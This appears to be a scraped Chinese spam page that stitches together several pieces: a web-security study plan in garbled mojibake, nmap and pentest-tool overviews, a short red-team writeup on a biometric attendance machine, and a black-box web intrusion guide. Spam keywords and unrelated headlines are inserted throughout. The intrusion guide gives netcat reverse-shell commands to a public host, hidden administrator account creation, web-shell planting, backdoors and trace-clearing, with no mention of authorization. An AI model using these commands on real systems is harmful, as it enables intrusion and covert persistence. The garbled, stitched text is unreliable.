1.webå®å
¨è¦å¦ä»ä¹
2.ç½ç»ç®¡çåä¼åºäºä»ä¹ç®çä½¿ç¨ nmap å·¥å
·
3.渗透测试都用哪些工具?源码
4.对生物识别考勤机的一次简单渗透
5.微步荐读:19款最好用的免费安全工具,每个安全岗几乎都用得上
6.web渗透是分析什么?
webå®å ¨è¦å¦ä»ä¹
å¦ä¹ Webå®å ¨éè¦ææ¡Webå®å ¨ç¸å ³æ¦å¿µãæ¸éæµè¯ç¸å ³å·¥å ·ãæ¸éå®ææä½ãçæWindows/Kali Linuxãä¸é´ä»¶åæå¡å¨çå®å ¨é ç½®ãèæ¬ç¼ç¨å¦ä¹ ãæºç 审计ä¸æ¼æ´åæãå®å ¨ä½ç³»è®¾è®¡ä¸å¼åççãç®ååä¸ä¸ªå¦ä¹ è§åï¼
第ä¸æ¥ï¼Webå®å ¨ç¸å ³æ¦å¿µ
建议å¦ä¹ æ¶é´ï¼2å¨
å¦ä¹ å 容å¦ä¸ï¼
1ãçæåºæ¬æ¦å¿µ(SQLæ³¨å ¥ãä¸ä¼ ãXSSãCSRFãä¸å¥è¯æ¨é©¬ç)ã
2ãéè¿å ³é®å(SQLæ³¨å ¥ãä¸ä¼ ãXSSãCSRFãä¸å¥è¯æ¨é©¬ç)è¿è¡Googleã
3ãé 读ãWebå®å ¨æ·±åº¦åæãï¼ä½ä¸ºå ¥é¨å¦ä¹ è¿æ¯å¯ä»¥çã
4ãçä¸äºæ¸éç¬è®°/è§é¢ï¼äºè§£æ¸éå®æçæ´ä¸ªè¿ç¨ï¼å¯ä»¥Google(æ¸éç¬è®°ãæ¸éè¿ç¨ãå ¥ä¾µè¿ç¨ç)ã
第äºæ¥ï¼çææ¸éç¸å ³å·¥å ·
建议å¦ä¹ æ¶é´ï¼3å¨
å¦ä¹ å 容å¦ä¸ï¼
1ãçæAWVSãSqlmapãBurpsuiteãNessusãChina chopper ãNmapãAppscançç¸å ³å·¥å ·ç使ç¨ã
2ãäºè§£è¯¥ç±»å·¥å ·çç¨éå使ç¨åºæ¯ã
3ãä¸è½½æ åé¨ççè¿äºè½¯ä»¶è¿è¡å®è£ ã
4ãå¦ä¹ 并è¿è¡ä½¿ç¨ï¼å ·ä½ææå¯ä»¥å¨ç½ä¸æç´¢ï¼ä¾å¦ï¼Burpsuiteçæç¨ãSqlmapã
5ã常ç¨çè¿å 个软件é½å¦ä¼åï¼å¯ä»¥å®è£ é³éå¯å¨åä¸ä¸ªæ¸éå·¥å ·ç®±
第ä¸æ¥ï¼æ¸éå®ææä½
建议å¦ä¹ æ¶é´ï¼5å¨
å¦ä¹ å 容å¦ä¸ï¼
1ãææ¡æ¸éçæ´ä¸ªé¶æ®µå¹¶è½å¤ç¬ç«æ¸éå°åç«ç¹ã
2ãç½ä¸æ¾æ¸éè§é¢ç并æèå ¶ä¸çæè·¯ååçï¼å ³é®å(æ¸éãSQLæ³¨å ¥è§é¢ãæ件ä¸ä¼ å ¥ä¾µãæ°æ®åºå¤ä»½ãDedecmsæ¼æ´å©ç¨çç)ã
3ãèªå·±æ¾ç«ç¹/æ建æµè¯ç¯å¢è¿è¡æµè¯ï¼è®°ä½è¯·éèå¥½ä½ èªå·±ã
4ãæèæ¸é主è¦å为å 个é¶æ®µï¼æ¯ä¸ªé¶æ®µéè¦ååªäºå·¥ä½ï¼ä¾å¦è¿ä¸ªï¼PTESæ¸éæµè¯æ§è¡æ åã
5ãç 究SQLæ³¨å ¥çç§ç±»ãæ³¨å ¥åçãæå¨æ³¨å ¥æå·§ã
6ãç 究æ件ä¸ä¼ çåçï¼å¦ä½è¿è¡æªæã解ææ¼æ´å©ç¨çï¼åç §ï¼ä¸ä¼ æ»å»æ¡æ¶ã
7ãç 究XSSå½¢æçåçåç§ç±»ï¼å ·ä½å¦ä¹ æ¹æ³å¯ä»¥Googleã
8ãç 究Windows/Linuxææçæ¹æ³åå ·ä½ä½¿ç¨ï¼å¯ä»¥åèï¼ææã
9ãå¯ä»¥åè: å¼æºæ¸éæµè¯è弱系ç»ã
第åæ¥ï¼å ³æ³¨å®å ¨åå¨æ
建议å¦ä¹ æ¶é´ï¼1å¨
å¦ä¹ å 容å¦ä¸ï¼
1ãå ³æ³¨å®å ¨åçææ°æ¼æ´ãå®å ¨äºä»¶ä¸ææ¯æç« ã
2ãæµè§æ¯æ¥çå®å ¨ææ¯æç« /äºä»¶ã
3ãéè¿å¾®åãå¾®ä¿¡å ³æ³¨å®å ¨åçä»ä¸äººå(éå°å¤§ççå ³æ³¨æè 好åææå ³æ³¨)ï¼å¤©å¤©æ½æ¶é´å·ä¸ä¸ã
4ãéè¿feedly/é²æ订é å½å å¤å®å ¨ææ¯å客(ä¸è¦ä» éäºå½å ï¼å¹³æ¶å¤æ³¨æ积累)ã
5ãå »æä¹ æ¯ï¼æ¯å¤©ä¸»å¨æ交å®å ¨ææ¯æç« é¾æ¥å°iæ¥ç§ç¤¾åºè¿è¡ç§¯æ·ã
6ãå¤å ³æ³¨ä¸ææ°æ¼æ´å表ï¼å¯ä»¥ççhackeroneãfreebufãå®å ¨å®¢çï¼éå°å ¬å¼çæ¼æ´é½å»å®è·µä¸ã
7ãå ³æ³¨å½å å½é ä¸çå®å ¨ä¼è®®çè®®é¢æè å½åã
8ãå å ¥ææ¯äº¤æµç¾¤ï¼ä¸ç¾¤å 大佬们讨æä¸äºç»éªåæå·§ã
第äºæ¥ï¼çæWindows/Kali Linux
建议å¦ä¹ æ¶é´ï¼3å¨
å¦ä¹ å 容å¦ä¸ï¼
1ãå¦ä¹ Windows/Kali Linuxåºæ¬å½ä»¤ã常ç¨å·¥å ·ã
2ãçæWindowsä¸ç常ç¨çcmdå½ä»¤ï¼ä¾å¦ï¼ipconfig,nslookup,tracert,net,tasklist,taskkillçã
3ãçæLinuxä¸ç常ç¨å½ä»¤ï¼ä¾å¦ï¼ifconfig,ls,cp,mv,vi,wget,service,sudoçã
4ãçæKali Linuxç³»ç»ä¸ç常ç¨å·¥å ·ï¼å¯ä»¥åèãWeb Penetration Testing with Kali LinuxãããHacking with Kaliãçã
5ãçæmetasploitå·¥å ·ï¼å¯ä»¥åèãMetasploitæ¸éæµè¯æåãã
第å æ¥ï¼ä¸é´ä»¶åæå¡å¨çå®å ¨é ç½®
建议å¦ä¹ æ¶é´ï¼3å¨
å¦ä¹ å 容å¦ä¸ï¼
1ãå¦ä¹ æå¡å¨ç¯å¢é ç½®ï¼å¹¶è½éè¿æèåç°é ç½®åå¨çå®å ¨é®é¢ã
2ãWindows serverç¯å¢ä¸çIISé ç½®ï¼ç¹å«æ³¨æé ç½®å®å ¨åè¿è¡æéã
3ãLinuxç¯å¢ä¸çLAMPçå®å ¨é ç½®ï¼ä¸»è¦èèè¿è¡æéãè·¨ç®å½ãæ件夹æéçã
4ãè¿ç¨ç³»ç»å åºï¼éå¶ç¨æ·ååå£ä»¤ç»éï¼éè¿iptableséå¶ç«¯å£ï¼é 置软件Wafå 强系ç»å®å ¨ï¼å¨æå¡å¨é ç½®mod_securityçç³»ç»ã
5ãéè¿Nessus软件对é ç½®ç¯å¢è¿è¡å®å ¨æ£æµï¼åç°æªç¥å®å ¨å¨èã
第ä¸æ¥ï¼èæ¬ç¼ç¨å¦ä¹
建议å¦ä¹ æ¶é´ï¼4å¨
å¦ä¹ å 容å¦ä¸ï¼
1ãéæ©èæ¬è¯è¨ï¼Perl/Python/PHP/Go/Javaä¸çä¸ç§ï¼å¯¹å¸¸ç¨åºè¿è¡ç¼ç¨å¦ä¹ ã
2ãæ建å¼åç¯å¢åéæ©IDEï¼PHPç¯å¢æ¨èWampåXAMPPï¼IDE强çæ¨èSublimeã
3ãPythonç¼ç¨å¦ä¹ ï¼å¦ä¹ å 容å å«ï¼è¯æ³ãæ£åãæ件ãç½ç»ãå¤çº¿ç¨ç常ç¨åºï¼æ¨èãPythonæ ¸å¿ç¼ç¨ãã
4ãç¨Pythonç¼åæ¼æ´çexpï¼ç¶ååä¸ä¸ªç®åçç½ç»ç¬è«ã
5ãPHPåºæ¬è¯æ³å¦ä¹ 并书åä¸ä¸ªç®åçå客系ç»ï¼åè§ãPHPä¸MySQLç¨åºè®¾è®¡(第4ç)ããè§é¢ã
6ãçæMVCæ¶æï¼å¹¶è¯çå¦ä¹ ä¸ä¸ªPHPæ¡æ¶æè Pythonæ¡æ¶(å¯é)ã
7ãäºè§£Bootstrapçå¸å±æè CSSã
ç¬¬å «æ¥ï¼æºç 审计ä¸æ¼æ´åæ
建议å¦ä¹ æ¶é´ï¼3å¨
å¦ä¹ å 容å¦ä¸ï¼
1ãè½ç¬ç«åæèæ¬æºç ç¨åºå¹¶åç°å®å ¨é®é¢ã
2ãçææºç 审计çå¨æåéææ¹æ³ï¼å¹¶ç¥éå¦ä½å»åæç¨åºã
3ãäºè§£Webæ¼æ´çå½¢æåå ï¼ç¶åéè¿å ³é®åè¿è¡æ¥æ¾åæã
4ãç 究Webæ¼æ´å½¢æåçåå¦ä½ä»æºç å±é¢é¿å 该类æ¼æ´ï¼å¹¶æ´çæchecklistã
å¦ä¹ å°åï¼iæ¥ç§å®ç½ï¼ä¼å®æ®¿ï¼
第ä¹æ¥ï¼å®å ¨ä½ç³»è®¾è®¡ä¸å¼å
建议å¦ä¹ æ¶é´ï¼5å¨
å¦ä¹ å 容å¦ä¸ï¼
1ãè½å»ºç«èªå·±çå®å ¨ä½ç³»ï¼å¹¶è½æåºä¸äºå®å ¨å»ºè®®æè ç³»ç»æ¶æã
2ãå¼åä¸äºå®ç¨çå®å ¨å°å·¥å ·å¹¶å¼æºï¼ä½ç°ä¸ªäººå®åã
3ã建ç«èªå·±çå®å ¨ä½ç³»ï¼å¯¹å ¬å¸å®å ¨æèªå·±çä¸äºè®¤è¯åè§è§£ã
4ãæåºæè å å ¥å¤§åå®å ¨ç³»ç»çæ¶ææè å¼åã
ç½ç»ç®¡çåä¼åºäºä»ä¹ç®çä½¿ç¨ nmap å·¥å ·
ç¨æ¥æ«æç½ä¸çµèå¼æ¾çç½ç»è¿æ¥ç«¯ãç¡®å®åªäºæå¡è¿è¡å¨åªäºè¿æ¥ç«¯ï¼å¹¶ä¸æ¨æ计ç®æºè¿è¡åªä¸ªæä½ç³»ç»ãnmapå·¥å ·å ·ä½åè½å¦ä¸ï¼1ãæ¢æµä¸ç»ä¸»æºæ¯å¦å¨çº¿ï¼
2ãæ«æ 主æºç«¯å£ï¼å æ¢ææä¾çç½ç»æå¡ï¼
3ãå¯ä»¥æ¨æ主æºæç¨çæä½ç³»ç» ã
Nmapå¯ç¨äºæ«æä» æ两个èç¹çLANï¼ç´è³ä¸ªèç¹ä»¥ä¸çç½ç»ãNmap è¿å 许ç¨æ·å®å¶æ«ææå·§ã
é常ï¼ä¸ä¸ªç®åç使ç¨ICMPåè®®çpingæä½å¯ä»¥æ»¡è¶³ä¸è¬éæ±ï¼ä¹å¯ä»¥æ·±å ¥æ¢æµUDPæè TCP端å£ï¼ç´è³ä¸»æºæ 使ç¨çæä½ç³»ç»ï¼è¿å¯ä»¥å°æææ¢æµç»æè®°å½å°åç§æ ¼å¼çæ¥å¿ä¸ï¼ ä¾è¿ä¸æ¥åææä½ã
æ©å±èµæï¼
Nmapçä¼ç¹ï¼
1ã çµæ´»ãæ¯ææ°åç§ä¸åçæ«ææ¹å¼ï¼æ¯æå¤ç§ç®æ 对象çæ«æã
2ã强大ãNmapå¯ä»¥ç¨äºæ«æäºèç½ä¸å¤§è§æ¨¡ç计ç®æºã
3ãå¯ç§»æ¤ãæ¯æ主æµæä½ç³»ç»ï¼Windows/Linux/Unix/MacOSççï¼æºç å¼æ¾ï¼æ¹ä¾¿ç§»æ¤ã
4ãç®åãæä¾é»è®¤çæä½è½è¦ç大é¨ååè½ï¼åºæ¬ç«¯å£æ«ænmap targetipï¼å ¨é¢çæ«ænmap âA targetipã
5ãèªç±ãNmapä½ä¸ºå¼æºè½¯ä»¶ï¼å¨GPL Licenseçèå´å å¯ä»¥èªç±ç使ç¨ã
6ãæ档丰å¯ãNmapå®ç½æä¾äºè¯¦ç»çææ¡£æè¿°ãNmapä½è åå ¶ä»å®å ¨ä¸å®¶ç¼åäºå¤é¨Nmapåè书ç±ã
åèèµææ¥æºï¼ç¾åº¦ç¾ç§-nmap
渗透测试都用哪些工具?
1. Invicti Pro:Invicti 是一款自动化且完全可配置的Web应用程序安全扫描工具,它能够帮助用户扫描网站、源码Web应用程序和Web服务,分析并识别安全漏洞。源码
2. Burp Suite:Burp Suite 与 Web 浏览器配合使用,分析党校平台源码旨在发现给定应用程序的源码功能和安全问题,是分析执行定制攻击的基础。尽管免费版本的源码功能有限,但付费版本提供了全面的分析网络爬取和扫描功能、多攻击点以及基于范围的源码配置选项。用户通常评价它能够自动化重复性任务,分析并提供应用程序与服务器交互的源码良好视图。
3. Nmap:Nmap 是分析一种网络探测工具,它能够以隐秘的源码方式避开入侵检测系统的监控,同时尽可能不影响目标系统的日常操作。此外,它还提供了防火墙规避和欺骗功能。
4. Metasploit Pro:Metasploit 是一款功能强大的安全漏洞检测工具,它帮助安全专业人员和IT专家识别安全问题、验证漏洞缓解措施,并管理专家驱动的安全评估。它的功能包括智能开发、代码审计、Web应用程序扫描和社会工程学。
5. Cobalt Strike:Cobalt Strike 是一个基于GUI的框架式渗透测试工具,集成了端口转发、服务扫描、自动化漏洞利用、类似会计公司的网站源码木马生成(包括Windows exe、dll、Java和Office宏病毒)等功能。它还支持钓鱼攻击,包括站点克隆、目标信息获取、Java执行和浏览器自动攻击等。
6. AWVS(Acunetix Web Vulnerability Scanner):AWVS 是一款知名的Web漏洞扫描工具,它通过网络爬虫测试您的网站安全,检测流行的安全漏洞。
7. Fortify:Fortify 是一个静态的、白盒的软件源代码安全测试工具。它通过内置的五大分析引擎(数据流、语义、结构、控制流和配置流)对应用软件的源代码进行静态分析,与软件安全漏洞规则集进行匹配查找,从而发现源代码中的安全漏洞,并能导出报告。
8. OWASP ZAP:OWASP ZAP 是一款开源的Web应用程序渗透测试和漏洞扫描工具,支持截断代理、主动和被动扫描、模糊测试、暴力破解,并提供了API。
9. DarkAngel:DarkAngel 是一款全自动的白帽漏洞扫描器,它从HackerOne、Bugcrowd资产监控到漏洞报告生成、数字化经营支付3.0源码企业微信通知等环节提供自动化服务。
. fscan:fscan 是一款内网综合扫描工具,提供一键式自动化、全方位的漏洞扫描功能。它支持主机存活探测、端口扫描、常见服务的爆破测试、MS-漏洞利用、Redis批量写公钥、计划任务反弹Shell、读取Windows网卡信息、Web指纹识别、Web漏洞扫描、NetBIOS探测、域控识别等。
对生物识别考勤机的一次简单渗透
在一次常规的红队行动中,我获得了客户授权,对一个基于生物信息的考勤设备进行渗透。设备用于日常考勤与特殊房间人员控制。尽管此前未接触该品牌机器,但通过初步检测,我成功掌握了其控制权。
设备运行于同一网络,已知其IP地址。使用nmap扫描后发现,设备开放了telnet和web服务。攻击策略主要围绕这两点展开,但telnet服务未暴露详细信息。缠论趋势通道主图源码转而关注Web服务,发现其为ZK Web Server 3.0。
深入了解后,发现Web服务存在大量漏洞,如访问控制缺失、会话固定与易受暴力破解。关键漏洞在于默认凭证(administrator:),借此我以管理员身份登录设备。
进入备份设备数据页面,发现数据可直接访问,无需身份验证。通过下载.dat文件,获取包含敏感信息的ZKConfig.cfg文件。以root身份登录telnet服务,检索系统文件,发现固件已被解压。
将文件系统挂载至本地机器,分析所有文件,发现webserver源代码,可用于深入研究。敏感数据包括所有用户照片与SQLite数据库记录的身份凭证、指纹等生物信息。利用这些信息,我可以修改数据库,赋予任意用户特殊房间访问权限。
进一步使用Firmwalker提取固件中敏感信息,了解设备数据备份至云服务器的机制。尽管未深入云主机渗透测试,内核源码树是什么意思但设备安全问题明显,配置缺陷使任何人都能通过简单漏洞获取敏感数据并完全控制。
结论是,物联网设备如考勤机常存在配置问题,易被利用。安全防护任重道远。本文由白帽汇整理翻译,不代表白帽汇立场。
微步荐读:款最好用的免费安全工具,每个安全岗几乎都用得上
安全工作中的效率提升,离不开得力工具的助力。今天,我们将揭示款实战力爆棚的免费安全工具,让你的每个安全岗位都能如虎添翼:Nmap:网络探测和安全的得力干将,深入洞察网络环境。
Wireshark:网络数据包分析神器,捕捉隐藏的通信细节。
Snort:实时入侵检测系统,守护网络安全的前沿阵地。
Ophcrack:密码破解高手,破解密码防线的钥匙。
Maltego:取证大师,OSINT(开放源码情报)的首选工具。
ZAP:渗透测试的得力助手,深度挖掘漏洞隐患。
Shodan:物联网设备搜索引擎,解锁隐藏的IoT世界。
Kali Linux:渗透测试专家的首选,实战能力强大。
DNS Dumpster:域名研究的利器,探索网络空间的深层结构。
Photon,作为一款强大的Python网络爬虫,凭借丰富的插件功能,如JSON导出、DNS集成,为OSINT探索提供无与伦比的便利。无论是取证专家还是安全研究员,都能从中受益匪浅。 微步云沙箱S,免费提供恶意软件分析和IOC(指标和模式)生成,支持多种文件类型,是你对抗恶意软件的第一道防线。 Nessus,知名漏洞扫描器,个人使用版本免费,专为安全检测而生,功能强大。 HFish,作为一款低交互蜜罐,企业级安全解决方案,跨平台适用。 微步在线X情报社区,汇集全面威胁分析和情报共享,免费开放,为安全人员提供知识宝库。 DarkSearch.io,对暗网探索新手友好,挖掘潜在威胁的藏身之处。 John the Ripper,密码破解界的传奇,支持多平台破解挑战。 OWASP Dependency-Check,开源软件分析工具,集成NVD和Sonatype OSS Index,确保软件供应链的安全。 Visual Studio,C#/.NET环境中的逆向工程专家,免费版支持Windows/Mac,源代码重构不在话下。 JetBrains dotPeek,免费的.NET反编译工具,JAR文件处理的得力助手。 Java Decompiler (JD),字节码转源代码的高效工具,JD-GUI或Eclipse插件让分析更加轻松。 Burp Suite,虽然免费版缺少Web漏洞扫描功能,但Web应用安全测试平台的地位不可撼动。 Metasploit,自年起引领漏洞利用开发,年被Rapid7收购,成为业界翘楚。 ModSecurity,虽然对系统稳定性可能产生影响,但其Web应用监控与访问控制作用不容小觑。 Aircrack-ng,随着年版本的升级,WiFi安全评估更上一层楼,硬件支持更加广泛。 探索更多工具的魅力,提升你的安全技能,从现在开始!web渗透是什么?
Web渗透测试分为白盒测试和黑盒测试,白盒测试是指目标网站的源码等信息的情况下对其渗透,相当于代码分析审计。而黑盒测试则是在对该网站系统信息不知情的情况下渗透,以下所说的Web渗透就是黑盒渗透。
Web渗透分为以下几个步骤,信息收集,漏洞扫描,漏洞利用,提权,内网渗透,留后门,清理痕迹。一般的渗透思路就是看是否有注入漏洞,然后注入得到后台管理员账号密码,登录后台,上传小马,再通过小马上传大马,提权,内网转发,进行内网渗透,扫描内网c段存活主机及开放端口,看其主机有无可利用漏洞(nessus)端口(nmap)对应服务及可能存在的漏洞,对其利用(msf)拿下内网,留下后门,清理痕迹。或者看是否有上传文件的地方,上传一句话木马,再用菜刀链接,拿到数据库并可执行cmd命令,可继续上大马.........思路很多,很多时候成不成功可能就是一个思路的问题,技术可以不高,思路一定得骚。
信息收集
信息收集是整个流程的重中之重,前期信息收集的越多,Web渗透的成功率就越高。
DNS域名信息:通过url获取其真实ip,子域名(Layer子域名爆破机),旁站(K8旁站,御剑1.5),c段,网站负责人及其信息(whois查询)
整站信息:服务器操作系统、服务器类型及版本(Apache/Nginx/Tomcat/IIS)、数据库类型(Mysql/Oracle/Accees/Mqlserver)、脚本类型(php/jsp/asp/aspx)、CMS类型;
网站常见搭配为:
ASP和ASPX:ACCESS、SQLServer
PHP:MySQL、PostgreSQL
JSP:Oracle、MySQL
敏感目录信息(御剑,dirbust)
开放端口信息(nmp)
漏洞扫描
利用AWVS,AppScan,OWASP-ZAP,等可对网站进行网站漏洞的初步扫描,看其是否有可利用漏洞。
常见漏洞:
SQL注入
XSS跨站脚本
CSRF跨站请求伪造
XXE(XML外部实体注入)漏洞
SSRF(服务端请求伪造)漏洞
文件包含漏洞
文件上传漏洞
文件解析漏洞
远程代码执行漏洞
CORS跨域资源共享漏洞
越权访问漏洞
目录遍历漏洞和任意文件读取/下载漏洞
漏洞利用
用工具也好什么也好对相应漏洞进行利用
如:
Sql注入(sqlmap)
XSS(BEEF)
后台密码爆破(burp)
端口爆破(hydra)
提权
获得shell之后我们权限可能很低,因此要对自己提权,可以根据服务器版本对应的exp进行提权,对于Windows系统也可看其补丁对应漏洞的exp进行提权
内网渗透
首先进行端口转发可用nc
nc使用方法:
反向连接
在公网主机上进行监听:
nc-lvp
在内网主机上执行:
nc-e cmd.exe 公网主机ip
成功之后即可得到一个内网主机shell
正向连接
远程主机上执行:
nc-l -p -t -e cmd.exe
本地主机上执行:
nc-vv 远程主机ip
成功后,本地主机即可远程主机的一个shell
然后就是对内网进行渗透了,可以用主机漏洞扫描工具(nessus,x-scan等)进行扫描看是否有可用漏洞,可用msf进行利用,或者用nmap扫描存活主机及开放端口,可用hydra进行端口爆破或者用msf对端口对应漏洞得到shell拿下内网留后门
留后门
对于网站上传一句话木马,留下后门
对于windows用户可用hideadmin创建一个超级隐藏账户
手工:
netuser test$ /add
netlocalgroup administrators test$ /add
这样的话在cmd命令中看不到,但在控制面板可以看到,还需要改注册表才能实现控制版面也看不到,太过麻烦,不多赘述,所以还是用工具省心省力。
中暑快按!中醫師認證「4穴位」舒緩不適 頭痛、出汗、心悸都有解
谁与争锋指标公式源码
黃重諺「軍工股上漲說」 藍酸是「分析師」、綠幫緩頰
重庆教学直播系统源码下载_重庆课程在线播放平台
一超市涉嫌哄抬物价 江西市场监管部门拟罚款50万元
佛山孕妇溯源码燕窝订制